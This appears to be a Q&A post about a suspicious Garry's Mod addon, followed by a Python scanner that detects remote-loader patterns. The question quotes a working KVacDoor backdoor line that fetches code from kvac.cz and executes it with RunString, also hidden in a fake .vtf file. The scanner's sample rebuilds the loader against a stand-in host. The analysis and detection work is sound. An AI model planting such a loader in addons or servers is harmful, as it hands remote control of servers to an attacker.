lua add-on virus garrys-mod

Is this GLua code malicious or not?


I received a sus version of an addon (gmod) and it has this inside:

timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=2SzqLfShfxnu81uPmMOi", function(b) RunString(b, ":", false) end)end)

and also another file in 'materials/npc/' called 'help.vtf' with the same code inside.

Could you help me to know if it is a backdoor or other malicious program, please?

(I also added the total Lua file: https://mega.nz/file/tLtnwC4Y#r5wqK-JRQPm3BZrA3x9FUIkzw5rjXgFq4HG8pf0yuMA)


Solution

  • The code is malicious. It is a common backdoor called KVacDoor, which allows the developer to execute Lua scripts and console commands and to take control over your server files.

    If you follow the base URL of the fetch request to https://kvac.cz you can learn more about this backdoor and how it functions.

    I would recommend uninstalling the addon.
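
A defensive check for the pattern in the question, added here as an example (it is not from the original post or from any Garry's Mod tooling): it walks an addon folder and flags files that both fetch over HTTP and execute a string, Lua calls sitting in non-.lua files, and `.vtf` files that do not start with the `VTF\0` texture signature. The finding labels, the sample tree and the `example.invalid` URL are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# GLua calls that download content, and calls that execute a string as code.
FETCH = re.compile(rb"\bhttp\.(?:Fetch|Post)\s*\(|\bHTTP\s*\(")
EXEC = re.compile(rb"\b(?:RunString|RunStringEx|CompileString)\s*\(")
VTF_MAGIC = b"VTF\x00"  # signature at the start of a real Valve texture file

def scan_file(path):
    """Return a list of finding labels (constructed names) for one file."""
    data = path.read_bytes()
    fetch, execs = FETCH.search(data), EXEC.search(data)
    findings = []
    if fetch and execs:
        findings.append("remote-loader")        # download + execute together
    if path.suffix.lower() != ".lua" and (fetch or execs):
        findings.append("lua-in-non-lua-file")  # code hidden in an asset
    if path.suffix.lower() == ".vtf" and not data.startswith(VTF_MAGIC):
        findings.append("bad-vtf-header")       # .vtf that is not a texture
    return findings

def scan_addon(root):
    """Walk an addon folder; map relative path -> findings for flagged files."""
    report = {}
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        if findings := scan_file(path):
            report[path.relative_to(root).as_posix()] = findings
    return report

def build_sample_addon(root):
    """Constructed sample tree mirroring the layout described in the question."""
    loader = (b'timer.Simple(1, function() http.Fetch("https://example.invalid/f", '
              b'function(b) RunString(b, ":", false) end) end)')
    files = {
        "lua/autorun/init.lua": loader,
        "lua/autorun/clean.lua": b'print("hello")',
        "materials/npc/help.vtf": loader,
        "materials/npc/real.vtf": VTF_MAGIC + b"\x07\x00\x00\x00" + bytes(64),
    }
    for rel, content in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_addon(tmp)
        print(scan_addon(tmp))
```

A clean result from this scan does not prove an addon is safe, since a loader can build the function names at runtime; treat it as a first pass before reading the code.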